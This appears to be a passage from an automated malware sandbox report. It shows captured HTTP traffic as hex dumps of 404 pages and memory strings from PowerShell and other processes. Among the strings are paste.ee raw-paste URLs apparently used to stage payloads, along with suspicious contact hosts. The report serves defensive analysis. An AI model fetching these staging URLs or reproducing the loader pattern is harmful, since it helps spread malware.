61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 
20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 15 Apr 2025 15:05:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 
20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 15 Apr 2025 15:05:32 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 
20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:05:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:05:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:05:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:05:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PASTE.EE/R/49ZDOXRT/0
                  Source: svchost.exe, 0000000D.00000002.2234977616.0000017B07000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: qmgr.db.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: powershell.exe, 00000007.00000002.1170496094.0000023510073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501B0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D91985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1098019416.0000015DA00F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000007.00000002.1116297999.0000023501A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                  Source: powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9192A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000057A4000.00000004.10000000.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.0000000003664000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EE74000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://samlib.ru/x6zj/?8ro=uF08wju0cXQ&3h5hA=pkzXSxPTT2YrTAYwTOcaicIRCimt47DVGFikR34exbY7UM7MJB5O
                  Source: iexpress.exe, 0000000C.00000002.2231547950.00000000057A4000.00000004.10000000.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000002.2230655033.0000000003664000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.1565665797.000000001EE74000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://samlib.ru/x6zj/?8ro=uF08wju0cXQ&amp;3h5hA=pkzXSxPTT2YrTAYwTOcaicIRCimt47DVGFikR34exbY7UM7MJB5
                  Source: powershell.exe, 00000005.00000002.1197339575.000001C9951C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D91593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000008.00000002.1078118141.0000015D9192A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000007.00000002.1183487116.000002357C566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                  Source: DmMVOWsP1JSI77P.exe, 00000014.00000002.2232234775.0000000005746000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.storii.shop
                  Source: DmMVOWsP1JSI77P.exe, 00000014.00000002.2232234775.0000000005746000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.storii.shop/4dea/
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                  Source: powershell.exe, 00000005.00000002.1197339575.000001C99519A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1197339575.000001C99517D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                  Source: powershell.exe, 00000007.00000002.1116297999.00000235004A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.0000023501AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.000002350166F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1116297999.00000235003C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D904D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D90633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D906E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9068D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1078118141.0000015D9070A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                  Source: iexpress.exe, 0000000C.00000003.1453378313.0000000007F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
